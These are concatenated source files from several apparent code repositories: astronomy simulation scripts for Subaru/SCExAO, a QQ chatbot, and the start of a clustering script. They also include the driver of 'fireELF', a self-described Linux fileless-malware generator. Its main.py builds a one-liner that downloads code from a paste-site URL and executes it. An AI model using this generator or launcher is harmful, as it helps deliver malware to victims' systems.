plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(img, origin='lower', cmap=plt.cm.gray)
ax[1].set_title('Log Normalized in float32')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
plt.show()
"""plotting again"""
fig, axes = plt.subplots(1, 2, figsize=(8, 5), sharex=True, sharey=True)
ax = axes.ravel()
ary=ax[0].imshow(rebinsum, origin='lower', cmap=plt.cm.gray)
ax[0].set_title('Rebinned Cube')
plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(img, origin='lower', cmap=plt.cm.gray)
ax[1].set_title('Log Normalized Rebinned Cube')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
plt.show()
fig.savefig('dither12.png', dpi=100)
plt.show()
"""creating an image to save"""
fig = plt.figure(frameon=False, figsize=(5.12, 5.12),dpi=100)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
cax = ax.imshow(img, origin='lower', cmap = "YlGnBu_r")
fig.savefig('rebinnedgraph.png', dpi=100)
plt.show()
```
#### File: MEDIS/Annulus Pipeline/Table Inpaint.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
from astropy.table import QTable, Table, Column
from astropy import units as u
dimage=np.load('np_align30.npy')
dthresh=np.load('thresh_a30.npy')
dtable=np.load('table_a30.npy')
#reimage=np.load('np_rebinned5e7.npy')
#rethresh=np.load('thresh5e7.npy')
#retable=np.load('table5e7.npy')
reimage=np.load('inpaint_a30.npy')
rethresh=np.load('thresh_inpaint_a30.npy')
retable=np.load('table_inpaint_a30.npy')
print(dtable.shape, retable.shape)
"""plot"""
fig, axes = plt.subplots(2, 2, figsize=(10,10), sharex=False, sharey=False)
ax = axes.ravel()
ary=ax[0].imshow(dimage, origin='lower', cmap = "YlGnBu_r")
ax[0].set_title('Temporal Cube Slice of MEC Image')
plt.colorbar(ary, ax=ax[0], fraction=0.046, pad=0.04)
imgplt=ax[1].imshow(dimage*dthresh, origin='lower', cmap = "YlGnBu_r")
ax[1].set_title('Masked Temporal MEC Image \nOnly Speckles')
plt.colorbar(imgplt, ax=ax[1], fraction=0.046, pad=0.04)
ary=ax[2].imshow(reimage, origin='lower', cmap = "YlGnBu_r")
ax[2].set_title('Inpainted MEC Image')
plt.colorbar(ary, ax=ax[2], fraction=0.046, pad=0.04)
imgplt=ax[3].imshow(reimage*rethresh, origin='lower', cmap = "YlGnBu_r")
ax[3].set_title('Masked Inpainted MEC Image \nOnly Speckles')
plt.colorbar(imgplt, ax=ax[3], fraction=0.046, pad=0.04)
plt.show()
"""table"""
middle=np.array([0,0,0,0])
retable=np.vstack((np.round(retable, decimals=2)))
dtable=np.vstack((np.round(dtable, decimals=2)))
#print(np.hstack([dname,rename]))
def reshape_rows(array1, array2):
if array1.shape[0] > array2.shape[0]:
resizea2=array2.copy()
resizea2.resize(array1.shape[0], array2.shape[1])
reshaped=np.hstack([array1, resizea2])
return(reshaped)
if array1.shape[0] < array2.shape[0]:
resizea1=array1.copy()
resizea1.resize(array2.shape[0], array1.shape[1])
reshaped=np.hstack([resizea1,array2])
return(reshaped)
else:
reshaped=np.hstack([array1, array2])
return(reshaped)
sidebyside=reshape_rows(retable, dtable)
show=Table(sidebyside, names=('Pixels', 'Speckles', 'Percent', 'Intensity', 'InPixels', 'InSpeckles', 'InPercent', 'InAvg Intensity'))
show.pprint_all()
```
#### File: MEDIS/medis/utils.py
```python
import numpy as np
from inspect import getframeinfo, stack
import pickle
import tables as pt
import astropy.io.fits as afits
from medis.params import sp, ap, tp, iop
def dprint(*message, path_display=-3):
"""
prints location of code where message is printed from
>>> dprint('foo', 5000, (), np.arange(9).reshape(3,3))
MEDIS++/medis/optics.py:173 - foo, 5000, (), [[0 1 2]
[3 4 5]
[6 7 8]]
path_display : integer number of folders back from the module location to display in printed statement
"""
caller = getframeinfo(stack()[1][0])
message_str = ''
for mess in message:
message_str += f'{mess}, '
message_str = message_str[:-2]
reduced_filename = '/'.join(caller.filename.split('/')[path_display:])
print("%s:%d - %s" % (reduced_filename, caller.lineno, message_str))
def phase_cal(wavelengths):
"""Wavelength in nm"""
phase = tp.wavecal_coeffs[0] * wavelengths + tp.wavecal_coeffs[1]
return phase
####################################################################################################
# Functions Relating to Reading, Loading, and Saving Data #
####################################################################################################
def save_to_disk_sequence(obs_sequence, obs_seq_file='obs_seq.pkl'):
"""saves obs sequence as a .pkl file
:param obs_sequence- Observation sequence, 6D data structure
:param obs_seq_file- filename for saving, including directory tree
"""
#dprint((obs_seq_file, obs_seq_file[-3:], obs_seq_file[-3:] == '.h5'))
if obs_seq_file[-3:] == 'pkl':
with open(obs_seq_file, 'wb') as handle:
pickle.dump(obs_sequence, handle, protocol=pickle.HIGHEST_PROTOCOL)
elif obs_seq_file[-3:] == 'hdf' or obs_seq_file[-3:] == '.h5':
f = pt.open_file(obs_seq_file, 'w')
ds = f.create_array(f.root, 'data', obs_sequence)
f.close()
else:
dprint('Extension not recognised')
def check_exists_obs_sequence(plot=False):
"""
This code checks to see if there is already
an observation sequence saved with the output of the run in the
location specified by the iop.
:return: boolean flag if it can find a file or not
"""
import os
if os.path.isfile(iop.obs_seq):
dprint(f"File already exists at {iop.obs_seq}")
return True
else:
return False
def open_obs_sequence(obs_seq_file='params.pkl'):
"""opens existing obs sequence .pkl file and returns it"""
with open(obs_seq_file, 'rb') as handle:
obs_sequence =pickle.load(handle)
return obs_sequence
def open_obs_sequence_hdf5(obs_seq_file='fields.h5'):
"""opens existing obs sequence .h5 file and returns it"""
read_hdf5_file = pt.open_file(obs_seq_file, mode='r')
# Here we slice [:] all the data back into memory, then operate on it
obs_sequence = read_hdf5_file.root.data[:]
# hdf5_clusters = read_hdf5_file.root.clusters[:]
read_hdf5_file.close()
return obs_sequence
def pretty_sequence_shape(cpx_sequence):
"""
displays data format easier
:param cpx_sequence: the 6D complex sequence generated by run_medis.telescope
:return: nicely parsed string of 6D shape--human readable output
"""
if len(np.shape(cpx_sequence)) == 6:
samps = ['timesteps', 'save planes', 'wavelengths', 'astronomical bodies', 'x', 'y']
delim = ', '
print(f"Shape of cpx_sequence = "
f"{delim.join([samp + ':' + str(length) for samp, length in zip(samps, np.shape(cpx_sequence))])}")
else:
print(f'Warning cpx_sequence is not 6D as intended by this function. Shape of sequence ='
f' {cpx_sequence.shape}')
####################################################################################################
# Functions Relating to Reading, Loading, and Saving Images #
####################################################################################################
def saveFITS(image, name='test.fit'):
header = afits.Header()
header["PIXSIZE"] = (0.16, " spacing in meters")
hdu = afits.PrimaryHDU(image, header=header)
hdu.writeto(name)
def readFITS(filename):
"""
reads a fits file and returns data fields only
:param filename: must specify full filepath
"""
hdulist = afits.open(filename)
header = hdulist[0].header
scidata = hdulist[0].data
return scidata
def clipped_zoom(img, zoom_factor, **kwargs):
from scipy.ndimage import zoom
h, w = img.shape[:2]
# For multichannel images we don't want to apply the zoom factor to the RGB
# dimension, so instead we create a tuple of zoom factors, one per array
# dimension, with 1's for any trailing dimensions after the width and height.
zoom_tuple = (zoom_factor,) * 2 + (1,) * (img.ndim - 2)
# Zooming out
if zoom_factor < 1:
# Bounding box of the zoomed-out image within the output array
zh = int(np.round(h * zoom_factor))
zw = int(np.round(w * zoom_factor))
top = (h - zh) // 2
left = (w - zw) // 2
# Zero-padding
out = np.zeros_like(img)
out[top:top+zh, left:left+zw] = zoom(img, zoom_tuple, **kwargs)
# Zooming in
elif zoom_factor > 1:
# Bounding box of the zoomed-in region within the input array
zh = int(np.round(h / zoom_factor))
zw = int(np.round(w / zoom_factor))
top = (h - zh) // 2
left = (w - zw) // 2
from medis.Utils.plot_tools import quicklook_im
out = zoom(img[top:top+zh, left:left+zw], zoom_tuple, **kwargs)
# quicklook_im(out, logZ=True)
# `out` might still be slightly larger than `img` due to rounding, so
# trim off any extra pixels at the edges
trim_top = ((out.shape[0] - h) // 2)
trim_left = ((out.shape[1] - w) // 2)
# print top, zh, left, zw
# print out.shape[0], trim_top, h, trim_left, w
if trim_top < 0 or trim_left < 0:
temp = np.zeros_like(img)
temp[:out.shape[0],:out.shape[1]] = out
out = temp
else:
out = out[trim_top:trim_top+h, trim_left:trim_left+w]
# quicklook_im(out, logZ=False)
# If zoom_factor == 1, just return the input array
else:
out = img
# import matplotlib.pyplot as plt
# plt.hist(out.flatten(), bins =100, alpha =0.5)
# plt.hist(img.flatten(), bins =100, alpha=0.5)
# plt.show()
# print(np.sum(img), np.sum(out))
# out = out*np.sum(img)/np.sum(out)
# out = out*4
return out
```
#### File: simulations/Subaru/Subaru_SCExAO.py
```python
import numpy as np
from inspect import getframeinfo, stack
import proper
from medis.params import iop, sp, ap, tp
from medis.utils import dprint
import medis.optics as opx
import medis.aberrations as aber
import medis.adaptive as ao
import medis.atmosphere as atmos
import medis.coronagraphy as cg
#################################################################################################
#################################################################################################
#################################################################################################
# iop.update_testname('SCExAO-dummy-save')
# Defining Subaru parameters
# ----------------------------
# According to Iye-et.al.2004-Optical_Performance_of_Subaru:AstronSocJapan, the AO188 uses the IR-Cass secondary,
# but then feeds it to the IR Nasmyth f/13.6 focusing arrangement. So instead of simulating the full Subaru system,
# we can use the effective focal length at the Nasmyth focus, and simulate it as a single lens.
tp.d_nsmyth = 7.9716 # m pupil diameter
tp.fn_nsmyth = 13.612 # f# Nasmyth focus
tp.flen_nsmyth = tp.d_nsmyth * tp.fn_nsmyth # m focal length
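# (i.e. 7.9716 m * 13.612 ~= 108.5 m effective focal length at the Nasmyth focus)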
tp.dist_nsmyth_ao1 = tp.flen_nsmyth + 1.14 # m distance secondary to M1 of AO188 (hand-tuned, could update with
# data from literature)
# Below are the actual dimensions of the Subaru telescope.
# --------------------------------
# tp.enterence_d = 8.2 # m diameter of primary
# tp.flen_primary = 15 # m focal length of primary
# tp.dist_pri_second = 12.652 # m distance primary -> secondary
# Secondary
tp.d_secondary = 1.265 # m diameter secondary, used for central obscuration
# tp.fn_secondary = 12.6
# Re-writing params terms in Subaru-units
# need this to accurately make atmospheric and aberration maps
tp.entrance_d = tp.d_nsmyth
tp.flen_primary = tp.flen_nsmyth
# ----------------------------
# AO188 DM
tp.act_woofer = 15 # approximately a 188 DM (13*13=169) but then we include +2 pixels because the dm map is oversized
# by 2 pixels around the edge of the array
# ----------------------------
# AO188 OAP1
# Parameters taken from "Design of the Subaru laser guide star adaptive optics module"
# <NAME> et al. SPIE doi: 10.1117/12.551032
tp.d_ao1 = 0.20 # m diameter of AO1
tp.fl_ao1 = 1.201 # m focal length OAP1
tp.dist_ao1_dm = 1.345 # m distance OAP1 to DM
# ----------------------------
# AO188 OAP2
tp.dist_dm_ao2 = 2.511-tp.dist_ao1_dm # m distance DM to OAP2
tp.d_ao2 = 0.2 # m diameter of AO2
tp.fl_ao2 = 1.201 # m focal length AO2
tp.dist_oap2_focus = 1.261
# ------------------------------
# SCExAO
# These params aren't actually working, so just doing very basic, 4F optical systems until further notice
tp.d_tweeter = 0.051 # diameter of optics in SCExAO train are 2 inches=0.051 m
tp.act_tweeter = 50 # SCExAO actuators are 50x50=2500 actuators
tp.fl_SxOAPG = 0.255 # m focal length of Genera SCExAO lens (OAP1,3,4,5)
tp.fl_SxOAP2 = 0.519 # m focal length of SCExAO OAP 2
tp.d_SxOAPG = 0.051 # diameter of SCExAO OAP's
# tp.dist_cg_sl1 = tp.fl_SxOAPG + .000001 # m distance between AO188 focus and scexao lens1
tp.dist_SxOAP1_scexao = 0.1345 # m
tp.dist_scexao_sl2 = 0.2511 - tp.dist_SxOAP1_scexao # m
tp.dist_sl2_focus = 0.1261 # m
tp.lens_params = [{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.entrance_d,
'fl': tp.flen_nsmyth,
'dist': tp.dist_nsmyth_ao1,
'name': 'effective-primary'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_ao1,
'fl': tp.fl_ao1,
'dist': tp.dist_ao1_dm,
'name': 'ao188-OAP1'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_ao2,
'fl': tp.fl_ao2,
'dist': tp.dist_oap2_focus,
'name': 'ao188-OAP2'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_SxOAPG,
'fl': tp.fl_SxOAPG,
'dist': tp.fl_SxOAPG,
'name': 'SxOAPG'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_SxOAPG,
'fl': tp.fl_SxOAP2,
'dist': tp.fl_SxOAP2,
'name': 'SxOAP2'}
]
# ------------------------------
# Coronagraph
tp.cg_type = 'Gaussian'
tp.cg_size = 2 # physical size or lambda/D size
tp.cg_size_units = "l/D" # "m" or "l/D"
# tp.fl_cg_lens = 0.1021 # m
tp.fl_cg_lens = tp.fl_SxOAPG
tp.lyot_size = 0.9 # units are in fraction of surface blocked
#################################################################################################
#################################################################################################
#################################################################################################
def Subaru_SCExAO(empty_lamda, grid_size, PASSVALUE):
"""
propagates instantaneous complex E-field thru Subaru from the primary through SCExAO
this function is called a 'prescription' by proper
uses PyPROPER3 to generate the complex E-field at the source, then propagates it through atmosphere,
then telescope, to the focal plane
the AO simulator happens here
this does not include the observation of the wavefront by the detector
:returns spectral cube at instantaneous time in the focal_plane()
"""
# print("Propagating Broadband Wavefront Through Subaru")
# Initialize the Wavefront in Proper
wfo = opx.Wavefronts(sp.debug)
wfo.initialize_proper()
# Atmosphere
# atmos has only effect on phase delay, not intensity
wfo.loop_collection(atmos.add_atmos, PASSVALUE['iter'], plane_name='atmosphere')
# Defines aperture (baffle-before primary)
# wfo.loop_collection(opx.add_obscurations, d_primary=tp.entrance_d, d_secondary=tp.d_secondary, legs_frac=0.05)
wfo.loop_collection(opx.SubaruPupil, plane_name='SubaruPupil')
wfo.loop_collection(proper.prop_circular_aperture,
**{'radius': tp.entrance_d / 2}) # clear inside, dark outside
wfo.loop_collection(proper.prop_define_entrance, plane_name='entrance_pupil') # normalizes abs intensity
if ap.companion:
# Must do this after all calls to prop_define_entrance
wfo.loop_collection(opx.offset_companion)
wfo.loop_collection(proper.prop_circular_aperture,
**{'radius': tp.entrance_d / 2}) # clear inside, dark outside
# Test Sampling
if sp.verbose:
wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "Telescope Aperture",
getframeinfo(stack()[0][0]), units='mm')
# Testing Primary Focus (instead of propagating to focal plane)
# wfo.loop_collection(opx.prop_pass_lens, tp.flen_nsmyth, tp.flen_nsmyth) # test only going to prime focus
########################################
# Subaru Propagation
#######################################
# Effective Primary
# CPA from Effective Primary
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='effective-primary') # high order
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)) # low order
wfo.loop_collection(opx.prop_pass_lens, tp.flen_nsmyth, tp.dist_nsmyth_ao1)
########################################
# AO188 Propagation
########################################
# # AO188-OAP1
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='ao188-OAP1') # high order
wfo.loop_collection(opx.prop_pass_lens, tp.fl_ao1, tp.dist_ao1_dm)
# AO System
if tp.use_ao:
WFS_map = ao.open_loop_wfs(wfo)
wfo.loop_collection(ao.deformable_mirror, WFS_map, PASSVALUE['iter'], apodize=True,
plane_name='woofer', debug=sp.verbose) # don't use PASSVALUE['WFS_map'] here because open loop
# ------------------------------------------------
wfo.loop_collection(proper.prop_propagate, tp.dist_dm_ao2)
# AO188-OAP2
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='ao188-OAP2') # high order CPA
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)/2) # low order CPA
wfo.loop_collection(opx.prop_pass_lens, tp.fl_ao2, tp.dist_oap2_focus)
########################################
# SCExAO
# #######################################
# SXExAO Reimaging 1
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='SxOAPG') # high order CPA
wfo.loop_collection(proper.prop_propagate, tp.fl_SxOAPG) # from AO188 focus to S-OAP1
wfo.loop_collection(opx.prop_pass_lens, tp.fl_SxOAPG, tp.fl_SxOAPG) # from SxOAP1 to tweeter-DM
#
# AO System
if tp.use_ao:
# WFS_map = ao.open_loop_wfs(wfo)
wfo.loop_collection(ao.deformable_mirror, WFS_map, PASSVALUE['iter'], apodize=True,
plane_name='tweeter', debug=sp.verbose)
# ------------------------------------------------
wfo.loop_collection(proper.prop_propagate, tp.fl_SxOAPG) # from tweeter-DM to OAP2
# SXExAO Reimaging 2
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='SxOAP2') # high order NCPA
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)/2) # low order NCPA
wfo.loop_collection(opx.prop_pass_lens, tp.fl_SxOAP2, tp.fl_SxOAP2, plane_name='post-DM-focus') #tp.dist_sl2_focus
# wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "post-DM-focus",
# getframeinfo(stack()[0][0]), units='nm')
# Coronagraph
# settings should be put into tp, and are not implicitly passed here
wfo.loop_collection(cg.coronagraph, occulter_mode=tp.cg_type, plane_name='coronagraph')
########################################
# Focal Plane
# #######################################
# Check Sampling in focal plane
# wfo.focal_plane fft-shifts wfo from Fourier Space (origin==lower left corner) to object space (origin==center)
cpx_planes, sampling = wfo.focal_plane()
if sp.verbose:
wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "focal plane",
getframeinfo(stack()[0][0]), units='nm')
# opx.check_sampling(PASSVALUE['iter'], wfo, "focal plane", getframeinfo(stack()[0][0]), units='arcsec')
if sp.verbose:
print(f"Finished datacube at timestep = {PASSVALUE['iter']}")
return cpx_planes, sampling
```
|
{
"source": "jesson20121020/myRobot",
"score": 3
}
|
#### File: jesson20121020/myRobot/AliceAutoReply.py
```python
import aiml
import os
import AutoReplyBase
_instance = None
def instance():
global _instance
if _instance == None:
_instance = AliceAutoReply()
return _instance
# English auto-reply provider: Alice
class AliceAutoReply(AutoReplyBase.AutoReplyBase):
def __init__(self):
super(AliceAutoReply, self).__init__()
cur_dir = os.getcwd()
os.chdir('./alice')
self.alice = aiml.Kernel()
self.alice.setBotPredicate("name", "Alice")
self.alice.learn("startup.xml")
a = self.alice.respond('LOAD ALICE')
os.chdir(cur_dir)
def respond(self, uid, msg):
result = self.alice.respond(msg)
print ' ROBOT:', result
return True, result
# print instance().respond('', 'hello')
```
#### File: jesson20121020/myRobot/QQChatbot.py
```python
from qqbot import QQBot
class MyQQBot(QQBot):
def onPollComplete(self, msgType, from_uin, buddy_uin, message):
# if message == '-hello':
# self.send(msgType, from_uin, '你好,我是QQ机器人')
# elif message == '-stop':
# self.stopped = True
# self.send(msgType, from_uin, 'QQ机器人已关闭')
import AutoReplyMgr
reply = AutoReplyMgr.instance().auto_reply(str(from_uin), message)
self.send(msgType, from_uin, reply)
myqqbot = MyQQBot()
myqqbot.Login()
myqqbot.Run()
class MyQQBot2(object):
def __init__(self):
self.x = 0
def test2(self):
pass
def test3(self):
self.x = 0
def test4(self):
import os
os.getcwd()
```
#### File: jesson20121020/myRobot/rpycserver.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os, commands, glob, re
import datetime
from rpyc import Service
from rpyc.utils.server import ThreadedServer
class remote_call_func(Service):
def exposed_test(self, output):
print output
import SpecialServiceMgr
print 'xdc::::', SpecialServiceMgr.instance().msg
return SpecialServiceMgr.instance().msg
def exposed_reload(self, module_name): # hot reload
import sys
if module_name in sys.modules:
module = sys.modules[module_name]
reload(module)
return 'reload_module successfully'
else:
return '%s is not exist' % module_name
# rpycServer = ThreadedServer(remote_call_func, hostname='localhost', port=11111, auto_register=False)
# rpycServer.start()
```
#### File: myRobot/train_system/ticketSearch.py
```python
from prettytable import PrettyTable
class TrainCollection(object):
"""解析列车信息"""
# Display: train number, departure/arrival station, departure/arrival time, duration, first-class seat, second-class seat, soft sleeper, hard sleeper, hard seat
header = "序号 车次 出发站/到达站 出发时间/到达时间 历时 商务座 一等座 二等座 软卧 硬卧 硬座 无座".split()
def __init__(self,rows,traintypes):
self.rows = rows
self.traintypes = traintypes
def _get_duration(self,row):
"""获取车次运行的时间"""
duration = row.get("lishi").decode('utf-8').replace(":",u"小时") + u"分"
if duration.startswith("00"):
return duration[4:]
elif duration.startswith("0"):
return duration[1:]
return duration
@property
def trains(self):
result = []
flag = 0
for row in self.rows:
if row["station_train_code"][0] in self.traintypes:
flag += 1
train = [# index
flag,# train number
row["station_train_code"],# departure/arrival stations
"/".join([row["from_station_name"],row["to_station_name"]]),# departure/arrival times
"/".join([row["start_time"],row["arrive_time"]]),# duration
self._get_duration(row),# business-class seats
row["swz_num"],# first-class seats
row["zy_num"],# second-class seats
row["ze_num"],# soft sleeper
row["rw_num"],# hard sleeper
row["yw_num"],# hard seat
row["yz_num"],# standing (no seat)
row["wz_num"]]
result.append(train)
return result
def print_pretty(self):
"""打印列车信息"""
pt = PrettyTable()
pt._set_field_names(self.header)
for train in self.trains:
pt.add_row(train)
print(pt)
if __name__ == "__main__":
t = TrainCollection()
```
#### File: jesson20121020/myRobot/Utils.py
```python
def is_chinese(uchar):
"""判断一个unicode是否是汉字"""
if uchar >= u'\u4e00' and uchar<=u'\u9fa5':
return True
else:
return False
# def is_number(uchar):
# """判断一个unicode是否是数字"""
# if uchar >= u'u0030' and uchar<=u'u0039':
# return True
# else:
# return False
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
import unicodedata
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
```
|
{
"source": "jessonfoo/fELF",
"score": 3
}
|
#### File: fELF/lib/generator.py
```python
import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
try:
return importlib.import_module(path)
except Exception as e:
return False
def gather_payloads(payload_dir):
payload_to_name = {}
for filepath in glob.iglob("{}*.py".format(payload_dir)):
payload_import_name = filepath[:-3].replace("/", ".")
payload = load_payload(payload_import_name)
if payload:
try:
name = payload.desc["name"].lower()
payload_to_name[name] = payload
print_info("Loaded Payload: '{}'".format(name), "!")
continue
except Exception as e:
print_info("Error Loading Payload", "-")
print_info("Unable to Load: {}".format(payload_import_name), "-")
return payload_to_name
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-")
```
#### File: jessonfoo/fELF/main.py
```python
import argparse
import sys
from lib.settings import *
from lib.generator import *
from lib.misc import *
class main(object):
def parse_args(self, args):
parser = argparse.ArgumentParser(description='fireELF, Linux Fileless Malware Generator')
parser.add_argument('-s', action="store_true", dest="is_supress_banner", help="Suppress Banner", default=False)
parser.add_argument('-p', action="store", dest="payload_name", help="Name of Payload to Use")
parser.add_argument('-w', action="store", dest="payload_filename", help="Name of File to Write Payload to (Highly Recommended if You're not Using the Paste Site Option)")
payload = parser.add_mutually_exclusive_group(required=True)
payload.add_argument('-u', action="store", dest="payload_url", help="Url of Payload to be Executed")
payload.add_argument('-e', action="store", dest="executable_path", help="Location of Executable")
return parser.parse_args(args)
def start(self, args):
options = self.parse_args(args)
if not options.is_supress_banner:
banner()
payload_to_use = ((options.payload_url, True), (open(options.executable_path, "rb").read(), False))[bool(options.executable_path)]
payload = generate(payload_to_use[0], payload_to_use[1], PAYLOAD_DIR, options.payload_name)
if payload:
print_info("Successfully Created Payload.", "+")
reduce_size = input("Miniaturize by Removing New Line Characters? (y/N) ").lower()
if reduce_size == "y":
payload = miniaturize_payload(payload)
upload_payload = input("Upload the Payload to Paste site? (y/N) ").lower()
if upload_payload == "y":
url = paste_site_upload(payload)
if url:
payload = "python -c \"import urllib2;exec(urllib2.urlopen('{}').read())\"".format(url)
if len(payload) < 150:
print_payload = input("Generated and Uploaded Payload is Below 150 Characters in Length, Print? (y/N) ").lower()
if print_payload == "y":
print("\n{}\n".format(payload))
if options.payload_filename:
with open(options.payload_filename, "w") as payload_file:
payload_file.write(payload)
payload_file.close()
print_info("Finished.", "!")
if __name__ == '__main__':
entry = main()
entry.start(sys.argv[1:])
```
|
{
"source": "jessrenteria/boggle-solver",
"score": 3
}
|
#### File: boggle-solver/src/anagrammer.py
```python
from trie import Trie
def makeSeq(seq_file):
seq = []
with open(seq_file, 'r') as f:
seq = list(map(lambda x: x.upper(), f.read().strip().split()))
return seq
def getAllWords(seq, t):
words = [set() for _ in range(len(seq))]
def getAllWordsHelper(used, t, s, idx):
used = list(used)
used[idx] = True
elem = seq[idx]
while t != None and elem != "":
t = t.getNode(elem[0])
s += elem[0]
elem = elem[1:]
if t == None:
return
if t.isWord():
words[len(s) - 1].add(s)
for x in range(len(seq)):
if not used[x]:
getAllWordsHelper(used, t, s, x)
used = [False for _ in range(len(seq))]
for idx in range(len(seq)):
getAllWordsHelper(used, t, "", idx)
return words
```
#### File: boggle-solver/src/boggler.py
```python
from trie import Trie
def makeGrid(grid_file):
grid = []
with open(grid_file, 'r') as f:
for line in f:
line = list(map(lambda x: x.upper(), line.strip().split()))
grid.append(line)
return grid
def getAllWords(grid, t):
words = [set() for _ in range(len(grid) * len(grid[0]))]
def getAllWordsHelper(used, t, s, r, c):
used = [list(used[i]) for i in range(len(used))]
used[r][c] = True
elem = grid[r][c]
while t != None and elem != "":
t = t.getNode(elem[0])
s += elem[0]
elem = elem[1:]
if t == None:
return
if t.isWord():
words[len(s) - 1].add(s)
for y in range(max(0, r - 1), min(len(grid), r + 2)):
for x in range(max(0, c - 1), min(len(grid[0]), c + 2)):
if not used[y][x]:
getAllWordsHelper(used, t, s, y, x)
used = [[False] * len(grid[0]) for _ in range(len(grid))]
for r in range(len(grid)):
for c in range(len(grid[0])):
getAllWordsHelper(used, t, "", r, c)
return words
```
#### File: boggle-solver/src/solver.py
```python
import argparse
import time
from trie import Trie
import anagrammer
import boggler
def makeTrie(dict_file):
tree = Trie()
with open(dict_file, 'r') as f:
for word in f:
tree.addWord(word.strip().upper())
return tree
def writeWords(found_file, words):
with open (found_file, 'w') as f:
for length in range(len(words) - 1, 0, -1):
for word in words[length]:
f.write(word + '\n')
def main():
parser = argparse.ArgumentParser(description="Word Finder")
parser.add_argument('dict', type=str, help="a file containing a list of valid words")
parser.add_argument('found', type=str, help="a file to dump found words")
args = parser.parse_args()
print("Making trie...")
start = time.time()
trie = makeTrie(args.dict)
elapsed = time.time() - start
print("Made trie in {:.4f} seconds.".format(elapsed))
while True:
print("> ", end='')
command = input()
if command == 'q' or command == "quit" or command == "exit":
print("Bye!")
break
command = command.split()
if (len(command) != 2
or (command[0] != "anagrammer" and command[0] != "boggler")):
print("Usage: (anagrammer seq_file|boggler grid_file)")
continue
words = []
print("Finding words...")
start = time.time()
if command[0] == "anagrammer":
seq = anagrammer.makeSeq(command[1])
words = anagrammer.getAllWords(seq, trie)
elif command[0] == "boggler":
grid = boggler.makeGrid(command[1])
words = boggler.getAllWords(grid, trie)
elapsed = time.time() - start
print("Found all words in {:.4f} seconds.".format(elapsed))
writeWords(args.found, words)
if __name__ == "__main__":
main()
```
|
{
"source": "jessrosenfield/unsupervised-learning",
"score": 3
}
|
#### File: jessrosenfield/unsupervised-learning/vowel-analysis.py
```python
import argparse
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import f_classif
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/v/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
